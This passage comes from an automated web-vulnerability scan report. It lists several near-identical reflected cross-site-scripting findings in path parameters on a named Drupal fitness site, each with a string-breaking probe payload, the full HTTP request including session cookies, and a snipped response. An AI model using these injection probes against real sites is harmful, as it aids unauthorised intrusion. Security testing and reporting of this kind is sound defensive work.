1.72. http://fitbie.msn.com/sites/default/files/after-ang-chris-patterson-th.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/default/files/after-ang-chris-patterson-th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 76313'%3b8665b915b0b was submitted in the REST URL parameter 2. This input was echoed as 76313';8665b915b0b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/default76313'%3b8665b915b0b/files/after-ang-chris-patterson-th.jpg?1297112848 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:16 +0000
ETag: "1297607176-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:26:16 GMT
Date: Sun, 13 Feb 2011 14:26:16 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49339

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default76313';8665b915b0b?destination=node%2Fdefault76313';8665b915b0b&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.73. http://fitbie.msn.com/sites/default/files/after-ang-chris-patterson-th_0.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/default/files/after-ang-chris-patterson-th_0.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 634a5'%3b4ac34cac64c was submitted in the REST URL parameter 2. This input was echoed as 634a5';4ac34cac64c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/default634a5'%3b4ac34cac64c/files/after-ang-chris-patterson-th_0.jpg?1297117181 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:30 +0000
ETag: "1297607190-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:26:31 GMT
Date: Sun, 13 Feb 2011 14:26:31 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49347

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default634a5';4ac34cac64c?destination=node%2Fdefault634a5';4ac34cac64c&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.74. http://fitbie.msn.com/sites/default/files/after-anthony-henry-th.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/default/files/after-anthony-henry-th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 519ab'%3be43b7dad74a was submitted in the REST URL parameter 2. This input was echoed as 519ab';e43b7dad74a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/default519ab'%3be43b7dad74a/files/after-anthony-henry-th.jpg?1296858728 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:27 +0000
ETag: "1297607187-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:26:28 GMT
Date: Sun, 13 Feb 2011 14:26:28 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49315

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default519ab';e43b7dad74a?destination=node%2Fdefault519ab';e43b7dad74a&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.75. http://fitbie.msn.com/sites/default/files/after-aracely-todd-petrich-th.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/default/files/after-aracely-todd-petrich-th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f110a'%3b9ade2ec551c was submitted in the REST URL parameter 2. This input was echoed as f110a';9ade2ec551c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/defaultf110a'%3b9ade2ec551c/files/after-aracely-todd-petrich-th.jpg?1297115089 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:17 +0000
ETag: "1297607177-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:26:18 GMT
Date: Sun, 13 Feb 2011 14:26:18 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49343

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/defaultf110a';9ade2ec551c?destination=node%2Fdefaultf110a';9ade2ec551c&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.76. http://fitbie.msn.com/sites/default/files/after-ben-janet-hankins-th.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/default/files/after-ben-janet-hankins-th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85fad'%3b4eeed3f4789 was submitted in the REST URL parameter 2. This input was echoed as 85fad';4eeed3f4789 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/default85fad'%3b4eeed3f4789/files/after-ben-janet-hankins-th.jpg?1297114172 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:25 +0000
ETag: "1297607185-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3599
Expires: Sun, 13 Feb 2011 15:26:25 GMT
Date: Sun, 13 Feb 2011 14:26:26 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49331

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default85fad';4eeed3f4789?destination=node%2Fdefault85fad';4eeed3f4789&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.77. http://fitbie.msn.com/sites/default/files/after-kris-sumey-th.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/default/files/after-kris-sumey-th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73672'%3bfa4b9480dc2 was submitted in the REST URL parameter 2. This input was echoed as 73672';fa4b9480dc2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/default73672'%3bfa4b9480dc2/files/after-kris-sumey-th.jpg?1296856223 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:34 +0000
ETag: "1297607194-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:26:34 GMT
Date: Sun, 13 Feb 2011 14:26:34 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default73672';fa4b9480dc2?destination=node%2Fdefault73672';fa4b9480dc2&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.78. http://fitbie.msn.com/sites/default/files/after-randy-sumey-th.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/default/files/after-randy-sumey-th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 153c1'%3be1a3fda9046 was submitted in the REST URL parameter 2. This input was echoed as 153c1';e1a3fda9046 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/default153c1'%3be1a3fda9046/files/after-randy-sumey-th.jpg?1296857455 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:34 +0000
ETag: "1297607194-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:26:34 GMT
Date: Sun, 13 Feb 2011 14:26:34 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49307

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
